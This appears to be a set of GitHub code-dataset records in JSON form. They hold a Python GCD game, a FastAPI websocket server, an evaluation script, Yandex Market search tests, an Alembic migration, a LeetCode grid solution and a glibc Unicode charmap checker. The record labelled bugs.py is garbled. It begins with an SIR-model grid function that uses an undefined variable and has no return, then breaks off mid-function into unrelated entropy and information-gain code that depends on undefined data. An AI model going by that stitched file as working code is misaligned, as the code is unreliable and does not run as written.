clock.tick(60)\n","repo_name":"Dragonfly774/dinoEgorka","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"31077378135","text":"\"\"\"The module contains the rules of the game and its functions.\"\"\"\nfrom random import randint\n\nRULES = 'Find the greatest common divisor of given numbers.'\nBOUNDS = (0, 100)\n\n\ndef get_gcd(number_one, number_two):\n    \"\"\"\n    Calculate the greatest common divisor.\n\n    Parameters:\n        number_one: int,\n        number_two: int\n\n    Returns:\n        greatest common divisor.\n    \"\"\"\n    while number_one != 0 and number_two != 0:\n        if number_one > number_two:\n            number_one %= number_two\n        else:\n            number_two %= number_one\n    return number_one + number_two\n\n\ndef get_game_data():\n    \"\"\"\n    Generate question number and return correct answer.\n\n    Returns:\n        cor_answer,\n        question_string.\n    \"\"\"\n    num1 = randint(*BOUNDS)\n    num2 = randint(*BOUNDS)\n    quest_number = get_gcd(num1, num2)\n    return str(quest_number), '{0} {1}'.format(num1, num2)\n","repo_name":"Valerii-Denisov/python-project-lvl1","sub_path":"brain_games/games/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"27367185058","text":"'''\n    SIR model over two dimensional grid \n    nodes are located on a two-dimensional grid\n    each node is connected to the closest neighbors of distance d (d is a parameter)\n'''\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nimport matplotlib.pyplot as plt \nimport os\nimport pickle\nfrom sklearn.linear_model import LinearRegression\nfrom mpl_toolkits.mplot3d import Axes3D\n
os.environ['KMP_DUPLICATE_LIB_OK']='True'\nimport argparse\n\ndef eval_AI(I, d):\n    '''\n    computing the summation \\\\sum_j A_ij I_j \n    A_ij is non-zero when the node i and j are neighbors\n    '''\n    (nn,) = np.shape(I)\n    AI = np.zeros(nn)\n\n    for i in range(n):\n        for j in range(n):\n            if i>0:\n                AI[i*n+j] += I[(i-1)*n+j]\n            if i<n-1:\n                AI[i*n+j] += I[(i+1)*n+j]\n            if j>0: \n                AI[i*n+j] += I[i*n+(j-1)] \n            if j<n-1: \n                AI[i*n+j] += I[i*n+(j+1)] \n            if i>1:\n                AI[i*n+j] += I[(i-2)*n+j]\n            if i<n-2:\n                AI[i*n+j] += I[(i+2)*n+j]\n            if j>1: \n                AI[i*n+j] += I[i*n+(j-2)] \n            if j<n-2:\n                AI[i*n+j] += I[i*n+(j+2)]\n\nlength17_bugs = bugs[bugs['Length (mm)'] < 17].groupby(['Species'])['Species'].count()\nnot_length17_bugs = bugs[bugs['Length (mm)'] >= 17].groupby(['Species'])['Species'].count()\n\nlength20_bugs = bugs[bugs['Length (mm)'] < 20].groupby(['Species'])['Species'].count()\nnot_length20_bugs = bugs[bugs['Length (mm)'] >= 20].groupby(['Species'])['Species'].count()\n\nprint(\"\\\\nspecies, colors, and lengths are of type {}\".format(type(species)))\n\n# --------------------------------------------------------------------\n\nimport math\n\ndef entropy(elements):\n    \n    counts = list()\n    counts_sum = 0\n    entropy = 0\n    \n    for element in elements.iteritems():\n        counts.append(element[1]) # put all counts in a list\n        counts_sum += element[1] # add all counts\n    \n    #print(\"elements = {}\".format(elements))\n    #print(\"counts = {}, sum = {}\".format(counts, counts_sum))\n    \n    for count in counts:\n        probability = count / counts_sum\n        entropy -= probability*math.log2(probability)\n    \n    return pd.Series(data = [counts_sum, entropy], index = ['total', 'entropy'])\n\ndef information_gain(parent, child1, child2):\n    p = entropy(parent)\n    num_p = p['total']\n    p_entropy = p['entropy']\n    \n    c1 = entropy(child1)\n    num_c1 = c1['total']\n    c1_entropy = c1['entropy']\n    \n    c2 = entropy(child2)\n    num_c2 = c2['total']\n    c2_entropy = c2['entropy']\n    \n    return p_entropy - (num_c1/num_p*c1_entropy + num_c2/num_p*c2_entropy)\n\n# --------------------------------------------------------------------\n\nprint(\"Split Blue Information Gain = {}\".format(round(information_gain(species, blue_bugs, not_blue_bugs), 5)))\nprint(\"Split Brown Information Gain = {}\".format(round(information_gain(species, brown_bugs, not_brown_bugs), 5)))\nprint(\"Split Green Information Gain = {}\".format(round(information_gain(species, green_bugs, not_green_bugs), 5)))\nprint(\"Split < 17 Information Gain = {}\".format(round(information_gain(species, length17_bugs, not_length17_bugs), 5)))\nprint(\"Split < 20 Information Gain = {}\".format(round(information_gain(species, length20_bugs, not_length20_bugs), 5)))","repo_name":"ChristopheBunn/Udacity-Data-Scientist-Nanodegree","sub_path":"Scripts/bugs.py","file_name":"bugs.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"30536091141","text":"import asyncio\nimport logging\n\nfrom collections import defaultdict\nfrom typing import Dict, Set\n\nimport asyncpg\nimport websockets\n\nfrom fastapi import FastAPI, WebSocket\n\nfrom subscriptions import Subscription, SubscriptionsManager\nfrom exceptions import InvalidRequestException\nfrom models import Action, Message, Metric\nfrom repo import AssetsRepo\nfrom settings import DB_DSN\n\nlogger = logging.getLogger(__name__)\n\n\nasync def get_client_message(websocket: WebSocket, queue: asyncio.Queue) -> Message:\n    try:\n        async for data in websocket.iter_json():\n            await queue.put(Message(**data))\n    except Exception as exc:\n        logger.error(f'Invalid request. 
Error: {exc}', exc_info=True)\n raise InvalidRequestException\n\n\nasync def process_client_message(\n subs_manager: SubscriptionsManager, websocket: WebSocket, queue: asyncio.Queue\n) -> None:\n while True:\n if queue.empty():\n await asyncio.sleep(0)\n else:\n client_message: Message = await queue.get()\n if client_message.action == Action.assets:\n data = await subs_manager.assets_repo.get_assets_list()\n msg = Message(action=Action.assets, message={'assets': data})\n await websocket.send_json(msg.dict())\n elif client_message.action == Action.subscribe:\n asset_id = int(client_message.message['assetId'])\n if websocket in subs_manager.subscribers and subs_manager.subscribers[websocket].asset_id != asset_id:\n await subs_manager.resubscribe_client(websocket, asset_id)\n else:\n await subs_manager.subscribe_client(websocket, asset_id)\n\n\napp = FastAPI()\n\n\n@app.on_event('startup')\nasync def start_subs_processing() -> None:\n pool = await asyncpg.create_pool(DB_DSN)\n app.assets_storage = AssetsRepo(pool)\n app.subs_manager = SubscriptionsManager(app.assets_storage)\n asyncio.create_task(app.subs_manager.process_subscriptions())\n\n\n@app.websocket(\"/ws\")\nasync def websocket_endpoint(websocket: WebSocket):\n await websocket.accept()\n queue = asyncio.Queue()\n logger.info(f'new client at: {websocket}')\n while True:\n try:\n await asyncio.gather(\n get_client_message(websocket, queue),\n process_client_message(websocket.app.subs_manager, websocket, queue),\n )\n except InvalidRequestException:\n return websocket\n except websockets.exceptions.ConnectionClosedError as exc:\n print(f'Client at websocket {websocket} have closed the connection')\n logger.info(f'Client at websocket {websocket} have closed the connection')\n return websocket\n except Exception as exc:\n logger.exception(f'Unknown error occurred {exc}', exc_info=True)\n return websocket\n\n\nif __name__ == '__main__':\n import uvicorn\n\n # uvicorn.run(\"main:app\", port=8080, log_level='info', reload=True, loop='uvloop', host='0.0.0.0')\n uvicorn.run(\"main:app\", port=8080, log_level='info', loop='uvloop', host='0.0.0.0')\n","repo_name":"kestkest/metrics_app","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3803336327","text":"import time\n\nfrom contracts.contract import Contract\nfrom evaluation.spec_generator import spec_generator\nfrom evaluation.utils import save_lists_to_files\nfrom goals.goal import Goal\nfrom goals.library import Library\nfrom logic.specification.temporal import LTL\nfrom repair.utils.efficient_library import get_candidate_composition_efficient\nfrom repair.utils.library import get_candidate_composition\n\n\ndef get_search_time(spec: LTL, lib_specs: list[LTL]) -> tuple[float, int, int]:\n spec_contract: Contract = Contract(spec, _skip_sat=True)\n spec_goal: Goal = Goal(spec_contract)\n\n library_contracts: list[Contract] = [Contract(spec, _skip_sat=True) for spec in lib_specs]\n library_goals: list[Goal] = [Goal(contract) for contract in library_contracts]\n\n # library = Library(set(library_goals))\n library = {g.id: g for g in library_goals}\n time_elapsed, n_candidates, similarity_score = get_candidate_composition_efficient(library, spec_goal, evaluation=True)\n\n return time_elapsed, n_candidates, similarity_score\n\n\ndef gen_times_for(min_clauses: int = 1, max_clauses: int = 500):\n x = []\n ya = []\n yb = []\n for i in range(min_clauses, 
max_clauses):\n        spec, specs = spec_generator(i)\n        # get_search_time returns (time_elapsed, n_candidates, similarity_score); ignore the last value\n        spec_synth_time, library_synth_time, _similarity = get_search_time(spec, specs)\n        x.append(i)\n        ya.append(spec_synth_time)\n        yb.append(library_synth_time)\n    save_lists_to_files(x, ya, yb)\n\n\nif __name__ == '__main__':\n    gen_times_for()\n","repo_name":"pierg/cr3","sub_path":"evaluation/generate_library_data.py","file_name":"generate_library_data.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"20864984219","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner  # noqa\n\nfrom 
core.testcase import TestCase, main\nfrom core.types import HyperCategory, HyperCategoryType, MnPlace, Model, Offer, Picture, Shop\nfrom core.matcher import Absent, ElementCount\n\n\nclass T(TestCase):\n    @classmethod\n    def prepare(cls):\n        cls.settings.default_search_experiment_flags += ['market_new_cpm_iterator=0']\n        cls.settings.default_search_experiment_flags += ['market_filter_offers_with_model_without_sku=0']\n\n        cls.index.hypertree += [\n            HyperCategory(hid=1, output_type=HyperCategoryType.GURU, show_offers=True),\n            HyperCategory(hid=2, output_type=HyperCategoryType.GURU, show_offers=True),\n        ]\n\n        cls.index.models += [\n            Model(hyperid=101, hid=1, title='GURU model', ts=10100),\n            Model(hyperid=102, hid=1, title='GURUDUMMY model', ts=10200, is_guru_dummy=True),\n            Model(hyperid=103, hid=2, title='GURU model from other category', ts=10300),\n        ]\n\n        cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 10100).respond(0.6)\n        cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 10200).respond(0.5)\n        cls.matrixnet.on_place(MnPlace.BASE_SEARCH, 10300).respond(0.4)\n\n        cls.index.shops += [Shop(fesh=1, priority_region=213), Shop(fesh=2, priority_region=213)]\n\n        cls.index.offers += [\n            Offer(title='offer 1 for GURU model', hyperid=101, fesh=1),\n            Offer(title='offer 2 for GURU model', hyperid=101, fesh=2),\n            Offer(title='offer 1 for GURUDUMMY model', hyperid=102, fesh=1),\n            Offer(\n                title='offer 2 for GURUDUMMY model',\n                hyperid=102,\n                fesh=2,\n                picture=Picture(picture_id='uS6z5i755IOLmUXx1CKyOQ', width=100, height=100, group_id=1),\n            ),\n            # Checks that offers for the same model from the same shop are not collapsed.\n            # A picture must be specified, though, because otherwise duplicates with identical pictures are filtered out in TFilterByPicture\n            Offer(\n                title='offer 3 for GURUDUMMY model',\n                hyperid=102,\n                fesh=2,\n                picture=Picture(picture_id='oxGBOkyJnAGkH5rdYHRSQw', width=100, height=100, group_id=1),\n            ),\n            Offer(title='offer 1 for model 103', hyperid=103, fesh=1),\n        ]\n\n    def test_filtered_out_dummy_model(self):\n        '''Checks that without show_dummy_models, GURU_DUMMY models are ignored and their offers are not attached to models'''\n\n        response = self.report.request_json(\n            'debug=1&place=prime&hid=1&allow-collapsing=1&rids=213' '&rearr-factors=market_metadoc_search=no'\n        )\n        self.assertFragmentIn(\n            response,\n            {\n                'search': {\n                    'total': 4,\n                    'totalOffers': 3,\n                    'totalModels': 1,\n                    'results': [\n                        {\n                            'entity': 'product',\n                            'titles': {'raw': 'GURU model'},\n                            'offers': {'count': 2},\n                        },\n                        {\n                            'entity': 'offer',\n                            'titles': {'raw': 'offer 1 for GURUDUMMY model'},\n                            'model': Absent(),\n                            'shop': {'id': 1},\n                        },\n                        {\n                            'entity': 'offer',\n                            'titles': {'raw': 'offer 2 for GURUDUMMY model'},\n                            'model': Absent(),\n                            'shop': {'id': 2},\n                        },\n                        {\n                            'entity': 'offer',\n                            'titles': {'raw': 'offer 3 for GURUDUMMY model'},\n                            'model': Absent(),\n                            'shop': {'id': 2},\n                        },\n                    ],\n                },\n                'debug': {'brief': {'filters': {'MODEL_IS_DUMMY': 1}}},\n            },\n            allow_different_len=False,\n        )\n\n    def test_dummy_model_in_prime_result(self):\n        '''Checks that with show_dummy_models, GURU_DUMMY models are shown\n        and offers are attached to them\n        '''\n\n        response = self.report.request_json(\n            'debug=1&place=prime&hid=1&allow-collapsing=1&rids=213&rearr-factors=show_dummy_models=1'\n            '&rearr-factors=market_metadoc_search=no'\n        )\n        self.assertFragmentIn(\n            response,\n            {\n                'search': {\n                    'total': 2,\n                    'totalOffers': 0,\n                    'totalModels': 2,\n                    'results': [\n                        {\n                            'entity': 'product',\n                            'titles': {'raw': 'GURU model'},\n                            'offers': {'count': 2},\n                        },\n                        {\n                            'entity': 'product',\n                            
'titles': {'raw': 'GURUDUMMY model'},\n                            'offers': {'count': 3},\n                        },\n                    ],\n                },\n                'debug': {'brief': {'filters': ElementCount(0)}},\n            },\n        )\n\n    def test_productoffers(self):\n        req = 'place=productoffers&hyperid=102&rids=213'\n        for exp in ('', '&rearr-factors=show_dummy_models=1'):\n            response = self.report.request_json(req + exp)\n            self.assertFragmentIn(\n                response,\n                {\n                    'totalOffers': 3,\n                    'results': [\n                        {\n                            'entity': 'offer',\n                            'model': {'id': 102},\n                            'titles': {'raw': 'offer 1 for GURUDUMMY model'},\n                            'shop': {'id': 1},\n                        },\n                        {\n                            'entity': 'offer',\n                            'model': {'id': 102},\n                            'titles': {'raw': 'offer 2 for GURUDUMMY model'},\n                            'shop': {'id': 2},\n                        },\n                        {\n                            'entity': 'offer',\n                            'model': {'id': 102},\n                            'titles': {'raw': 'offer 3 for GURUDUMMY model'},\n                            'shop': {'id': 2},\n                        },\n                    ],\n                },\n            )\n\n    def test_modelinfo(self):\n        req = 'place=modelinfo&hyperid=101&hyperid=102&rids=213'\n        for exp in (True, False):\n            response = self.report.request_json(req + ('&rearr-factors=show_dummy_models=1' if exp else ''))\n            self.assertFragmentIn(\n                response,\n                {\n                    'results': [\n                        {\n                            'entity': 'product',\n                            'id': 101,\n                            'titles': {'raw': 'GURU model'},\n                            'categories': [{'id': 1, 'isLeaf': True}],\n                            'offers': {'count': 2},\n                        },\n                        {\n                            'entity': 'product',\n                            'id': 102,\n                            'titles': {'raw': 'GURUDUMMY model'},\n                            'categories': [{'id': 1, 'isLeaf': True}],\n                            'offers': {'count': 3},\n                        },\n                    ]\n                },\n            )\n\n    def wizard_title_text_obj(self, title):\n        return {'title': {'text': {'__hl': {'text': title}}}}\n\n    def test_filtered_out_implicit_models_in_parallel(self):\n        response = self.report.request_bs('place=parallel&text=model&rearr-factors=market_parallel_feature_log_rate=1')\n        self.assertFragmentIn(\n            response,\n            {\n                'market_implicit_model': [\n                    {\n                        'model_count': '2',\n                        'offer_count': 6,\n                        'showcase': {\n                            'items': [\n                                self.wizard_title_text_obj('GURU model'),\n                                self.wizard_title_text_obj('GURU model from other category'),\n                            ]\n                        },\n                    }\n                ],\n                'market_offers_wizard': [{'offer_count': 6}],\n            },\n            preserve_order=True,\n            allow_different_len=False,\n        )\n\n        self.feature_log.expect(model_id=101, position=1)\n        self.feature_log.expect(model_id=103, position=2)\n\n    def test_dummy_implicit_models_in_parallel(self):\n        response = self.report.request_bs(\n            'place=parallel&text=model&rearr-factors=show_dummy_models=1;market_parallel_feature_log_rate=1'\n        )\n        self.assertFragmentIn(\n            response,\n            {\n                'market_implicit_model': [\n                    {\n                        'model_count': '3',\n                        'offer_count': 6,\n                        'showcase': {\n                            'items': [\n                                self.wizard_title_text_obj('GURU model'),\n                                self.wizard_title_text_obj('GURUDUMMY model'),\n                                self.wizard_title_text_obj('GURU model from other category'),\n                            ]\n                        },\n                    }\n                ],\n                'market_offers_wizard': [{'offer_count': 6}],\n            },\n            preserve_order=True,\n            allow_different_len=False,\n        )\n\n        self.feature_log.expect(model_id=101, position=1)\n        self.feature_log.expect(model_id=102, position=2)\n        self.feature_log.expect(model_id=103, position=3)\n\n    def test_not_implicit_models_in_parallel(self):\n        req = 'place=parallel&text=GURUDUMMY'\n        response = self.report.request_bs(req)\n        self.assertFragmentIn(\n            response,\n            {'market_implicit_model': Absent(), 'market_model': Absent(), 'market_offers_wizard': [{'offer_count': 3}]},\n        )\n\n        response = self.report.request_bs(req + '&rearr-factors=show_dummy_models=1')\n        self.assertFragmentIn(\n            response,\n            {\n                'market_implicit_model': Absent(),  # there must be at least 2 models\n                'market_model': [\n                    {\n                        'title': {\"__hl\": {\"text\": \"GURUDUMMY model\", \"raw\": True}},\n                        'categoryId': 1,\n                        'showcase': {\n                        
\"items\": ElementCount(2)\n }, # найденно 3 оффера, но 2 из них из одного магазина, а такие схлопываются\n }\n ],\n 'market_offers_wizard': [{'offer_count': 3}],\n },\n allow_different_len=False,\n )\n\n def test_skip_dummy_model_docs(self):\n '''Проверка флага skip_dummy_model_docs_at_text_search. При нем на текстовом поиске должны отсеиваться документы-модели.\n Но при этом сами модели не должны пропасть из выдачи, а образоваться из схлопнутых офферов.\n '''\n\n def gen_req(allow_collapsing, skip_dummy_model_doc):\n req = 'place=prime&text=model&hid=1&allow-collapsing={}&rids=213&debug=1&rearr-factors=show_dummy_models=1;market_metadoc_search=no'.format(\n allow_collapsing\n )\n return req + ';skip_dummy_model_docs_at_text_search=1' if skip_dummy_model_doc else req\n\n product_101_json = {\n 'entity': 'product',\n 'slug': 'guru-model',\n 'id': 101,\n 'offers': {'count': 2},\n 'debug': {'isCollapsed': False},\n }\n\n for allow_collapsing in (1, 0):\n for skip_dummy_model_doc in (False, True):\n response = self.report.request_json(gen_req(allow_collapsing, skip_dummy_model_doc))\n if skip_dummy_model_doc:\n filter_debug = {'debug': {'brief': {'filters': {'MODEL_IS_DUMMY': 1}}}}\n self.assertFragmentIn(response, filter_debug)\n\n # модель 101 будет всегда, а модель 102 пропадет при skip_dummy_model_docs_at_text_search=1 + allow-collapsing=0\n total_models = 2 if not skip_dummy_model_doc or allow_collapsing else 1\n total_offers = 5 if not allow_collapsing else 0\n\n self.assertFragmentIn(\n response,\n {\n 'total': total_models + total_offers,\n 'totalModels': total_models,\n 'totalOffers': total_offers,\n 'results': ElementCount(total_models + total_offers),\n },\n )\n if total_models == 2:\n self.assertFragmentIn(\n response,\n [\n product_101_json,\n {\n 'entity': 'product',\n 'slug': 'gurudummy-model',\n 'id': 102,\n 'offers': {'count': 3},\n 'debug': {'isCollapsed': skip_dummy_model_doc},\n },\n ],\n )\n else:\n self.assertFragmentIn(response, product_101_json)\n self.assertFragmentNotIn(response, {'entity': 'product', 'id': 102})\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_dummy_models.py","file_name":"test_dummy_models.py","file_ext":"py","file_size_in_byte":14308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36722386267","text":"\"\"\"Additive rules display URI\n\nRevision ID: d0717332cec6\nRevises: 8f8083a8ad61\nCreate Date: 2019-05-08 10:02:43.067332\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd0717332cec6'\ndown_revision = '8f8083a8ad61'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('additive_rule_links', sa.Column('display_uri', sa.String(length=255), nullable=True))\n\n\ndef downgrade():\n op.drop_column('additive_rule_links', 'display_uri')\n","repo_name":"mitmedialab/gobo","sub_path":"migrations/versions/d0717332cec6_additve_rules_display_uri.py","file_name":"d0717332cec6_additve_rules_display_uri.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"72"} +{"seq_id":"31593048537","text":"from typing import List\n\n\nclass Solution:\n def solve(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n if len(board) is 0: return\n width = len(board[0]) - 1\n height = len(board) - 1\n def 
help(x: int, y: int):\n            if x < 0 or x > height or y < 0 or y > width:\n                return\n            if board[x][y] == \"O\":\n                board[x][y] = \"g\"\n                help(x - 1, y)\n                help(x, y - 1)\n                help(x + 1, y)\n                help(x, y + 1)\n\n        for i in range(width + 1):\n            if board[0][i] == \"O\":\n                help(0, i)\n            if board[height][i] == \"O\":\n                help(height, i)\n        for i in range(1, height):\n            if board[i][0] == \"O\":\n                help(i, 0)\n            if board[i][width] == \"O\":\n                help(i, width)\n\n        print(board)\n        for i in range(width + 1):\n            for j in range(height + 1):\n                if board[j][i] == \"O\":\n                    board[j][i] = \"X\"\n                elif board[j][i] == \"g\":\n                    board[j][i] = \"O\"\n\nboard = [[\"X\",\"O\",\"X\",\"O\",\"X\",\"O\"],\n         [\"O\",\"X\",\"O\",\"X\",\"O\",\"X\"],\n         [\"X\",\"O\",\"X\",\"O\",\"X\",\"O\"],\n         [\"O\",\"X\",\"O\",\"X\",\"O\",\"X\"]]\n\nsolution = Solution()\nsolution.solve(board)\nprint(board)","repo_name":"zhiwilliam/geekcoding","sub_path":"src/1-500/130/SurroundedRegions.py","file_name":"SurroundedRegions.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"}
{"seq_id":"21976268859","text":"import sys\nimport re\nimport argparse\n\n# Dictionary holding the entire contents of the UnicodeData.txt file\n#\n# Contents of this dictionary look like this:\n#\n# {0: {'category': 'Cc',\n#      'title': None,\n#      'digit': '',\n#      'name': '<control>',\n#      'bidi': 'BN',\n#      'combining': '0',\n#      'comment': '',\n#      'oldname': 'NULL',\n#      'decomposition': '',\n#      'upper': None,\n#      'mirrored': 'N',\n#      'lower': None,\n#      'decdigit': '',\n#      'numeric': ''},\n#  …\n# }\nUNICODE_ATTRIBUTES = {}\n\n# Dictionary holding the entire contents of the EastAsianWidths.txt file\n#\n# Contents of this dictionary look like this:\n#\n# {0: 'N', … , 45430: 'W', …}\nEAST_ASIAN_WIDTHS = {}\n\ndef fill_attribute(code_point, fields):\n    '''Stores in UNICODE_ATTRIBUTES[code_point] the values from the fields.\n\n    One entry in the UNICODE_ATTRIBUTES dictionary represents one line\n    in the UnicodeData.txt file.\n\n    '''\n    UNICODE_ATTRIBUTES[code_point] = {\n        'name': fields[1],          # Character name\n        'category': fields[2],      # General category\n        'combining': fields[3],     # Canonical combining classes\n        'bidi': fields[4],          # Bidirectional category\n        'decomposition': fields[5], # Character decomposition mapping\n        'decdigit': fields[6],      # Decimal digit value\n        'digit': fields[7],         # Digit value\n        'numeric': fields[8],       # Numeric value\n        'mirrored': fields[9],      # mirrored\n        'oldname': fields[10],      # Old Unicode 1.0 name\n        'comment': fields[11],      # comment\n        # Uppercase mapping\n        'upper': int(fields[12], 16) if fields[12] else None,\n        # Lowercase mapping\n        'lower': int(fields[13], 16) if fields[13] else None,\n        # Titlecase mapping\n        'title': int(fields[14], 16) if fields[14] else None,\n    }\n\ndef fill_attributes(filename):\n    '''Stores the entire contents of the UnicodeData.txt file\n    in the UNICODE_ATTRIBUTES dictionary.\n\n    A typical line for a single code point in UnicodeData.txt looks\n    like this:\n\n    0041;LATIN CAPITAL LETTER A;Lu;0;L;;;;;N;;;;0061;\n\n    Code point ranges are indicated by pairs of lines like this:\n\n    4E00;<CJK Ideograph, First>;Lo;0;L;;;;;N;;;;;\n    9FCC;<CJK Ideograph, Last>;Lo;0;L;;;;;N;;;;;\n    '''\n    with open(filename, mode='r') as unicode_data_file:\n        fields_start = []\n        for line in unicode_data_file:\n            fields = line.strip().split(';')\n            if len(fields) != 15:\n                sys.stderr.write(\n                    'short line in file \"%(f)s\": %(l)s\\n' %{\n                        'f': filename, 'l': line})\n                exit(1)\n            if fields[2] == 'Cs':\n                # Surrogates are UTF-16 artefacts,\n                # not real characters. 
Ignore them.\n                fields_start = []\n                continue\n            if fields[1].endswith(', First>'):\n                fields_start = fields\n                fields_start[1] = fields_start[1].split(',')[0][1:]\n                continue\n            if fields[1].endswith(', Last>'):\n                fields[1] = fields[1].split(',')[0][1:]\n                if fields[1:] != fields_start[1:]:\n                    sys.stderr.write(\n                        'broken code point range in file \"%(f)s\": %(l)s\\n' %{\n                            'f': filename, 'l': line})\n                    exit(1)\n                for code_point in range(\n                        int(fields_start[0], 16),\n                        int(fields[0], 16)+1):\n                    fill_attribute(code_point, fields)\n                fields_start = []\n                continue\n            fill_attribute(int(fields[0], 16), fields)\n            fields_start = []\n\ndef fill_east_asian_widths(filename):\n    '''Stores the entire contents of the EastAsianWidths.txt file\n    in the EAST_ASIAN_WIDTHS dictionary.\n\n    Lines in EastAsianWidths.txt are either a code point range like\n    this:\n\n    9FCD..9FFF;W # Cn [51] <reserved-9FCD>..<reserved-9FFF>\n\n    or a single code point like this:\n\n    A015;W # Lm YI SYLLABLE WU\n    '''\n    with open(filename, mode='r') as east_asian_widths_file:\n        for line in east_asian_widths_file:\n            match = re.match(\n                r'^(?P<codepoint1>[0-9A-F]{4,6})'\n                +r'(?:\\.\\.(?P<codepoint2>[0-9A-F]{4,6}))?'\n                +r'\\s*;\\s*(?P<property>[a-zA-Z]+)',\n                line)\n            if not match:\n                continue\n            start = match.group('codepoint1')\n            end = match.group('codepoint2')\n            if not end:\n                end = start\n            for code_point in range(int(start, 16), int(end, 16)+1):\n                EAST_ASIAN_WIDTHS[code_point] = match.group('property')\n\ndef ucs_symbol(code_point):\n    '''Return the UCS symbol string for a Unicode character.'''\n    if code_point < 0x10000:\n        return '<U{:04X}>'.format(code_point)\n    else:\n        return '<U{:08X}>'.format(code_point)\n\ndef create_charmap_dictionary(file_name):\n    '''Create a dictionary for all code points found in the CHARMAP\n    section of a file\n    '''\n    with open(file_name, mode='r') as utf8_file:\n        charmap_dictionary = {}\n        for line in utf8_file:\n            if line.startswith('CHARMAP'):\n                break\n        for line in utf8_file:\n            if line.startswith('END CHARMAP'):\n                return charmap_dictionary\n            if line.startswith('%'):\n                continue\n            match = re.match(\n                r'^<U(?P<codepoint1>[0-9A-F]{4,8})>'\n                +r'(:?\\.\\.<U(?P<codepoint2>[0-9-A-F]{4,8})>)?'\n                +r'\\s+(?P<hexutf8>(/x[0-9a-f]{2}){1,4})',\n                line)\n            if not match:\n                continue\n            codepoint1 = match.group('codepoint1')\n            codepoint2 = match.group('codepoint2')\n            if not codepoint2:\n                codepoint2 = codepoint1\n            for i in range(int(codepoint1, 16),\n                           int(codepoint2, 16) + 1):\n                charmap_dictionary[i] = match.group('hexutf8')\n        sys.stderr.write('No “CHARMAP” or no “END CHARMAP” found in %s\\n'\n                         %file_name)\n        exit(1)\n\ndef check_charmap(original_file_name, new_file_name):\n    '''Report differences in the CHARMAP section between the old and the\n    new file\n    '''\n    print('************************************************************')\n    print('Report on CHARMAP:')\n    ocharmap = create_charmap_dictionary(original_file_name)\n    ncharmap = create_charmap_dictionary(new_file_name)\n    print('------------------------------------------------------------')\n    print('Total removed characters in newly generated CHARMAP: %d'\n          %len(set(ocharmap)-set(ncharmap)))\n    if ARGS.show_missing_characters:\n        for key in sorted(set(ocharmap)-set(ncharmap)):\n            print('removed: {:s} {:s} {:s}'.format(\n                ucs_symbol(key),\n                ocharmap[key],\n                UNICODE_ATTRIBUTES[key]['name'] \\\n                if key in UNICODE_ATTRIBUTES else None))\n    print('------------------------------------------------------------')\n    changed_charmap = {}\n    for key in set(ocharmap).intersection(set(ncharmap)):\n        if ocharmap[key] != ncharmap[key]:\n            changed_charmap[key] = (ocharmap[key], ncharmap[key])\n    print('Total changed characters in newly generated 
CHARMAP: %d'\n          %len(changed_charmap))\n    if ARGS.show_changed_characters:\n        for key in sorted(changed_charmap):\n            print('changed: {:s} {:s}->{:s} {:s}'.format(\n                ucs_symbol(key),\n                changed_charmap[key][0],\n                changed_charmap[key][1],\n                UNICODE_ATTRIBUTES[key]['name'] \\\n                if key in UNICODE_ATTRIBUTES else None))\n    print('------------------------------------------------------------')\n    print('Total added characters in newly generated CHARMAP: %d'\n          %len(set(ncharmap)-set(ocharmap)))\n    if ARGS.show_added_characters:\n        for key in sorted(set(ncharmap)-set(ocharmap)):\n            print('added: {:s} {:s} {:s}'.format(\n                ucs_symbol(key),\n                ncharmap[key],\n                UNICODE_ATTRIBUTES[key]['name'] \\\n                if key in UNICODE_ATTRIBUTES else None))\n\ndef create_width_dictionary(file_name):\n    '''Create a dictionary for all code points found in the WIDTH\n    section of a file\n    '''\n    with open(file_name, mode='r') as utf8_file:\n        width_dictionary = {}\n        for line in utf8_file:\n            if line.startswith('WIDTH'):\n                break\n        for line in utf8_file:\n            if line.startswith('END WIDTH'):\n                return width_dictionary\n            match = re.match(\n                r'^<U(?P<codepoint1>[0-9A-F]{4,8})>'\n                +r'(:?\\.\\.\\.<U(?P<codepoint2>[0-9-A-F]{4,8})>)?'\n                +r'\\s+(?P<width>[02])',\n                line)\n            if not match:\n                continue\n            codepoint1 = match.group('codepoint1')\n            codepoint2 = match.group('codepoint2')\n            if not codepoint2:\n                codepoint2 = codepoint1\n            for i in range(int(codepoint1, 16),\n                           int(codepoint2, 16) + 1):\n                width_dictionary[i] = int(match.group('width'))\n        sys.stderr.write('No “WIDTH” or no “END WIDTH” found in %s\\n' %file_name)\n\ndef check_width(original_file_name, new_file_name):\n    '''Report differences in the WIDTH section between the old and the new\n    file\n    '''\n    print('************************************************************')\n    print('Report on WIDTH:')\n    owidth = create_width_dictionary(original_file_name)\n    nwidth = create_width_dictionary(new_file_name)\n    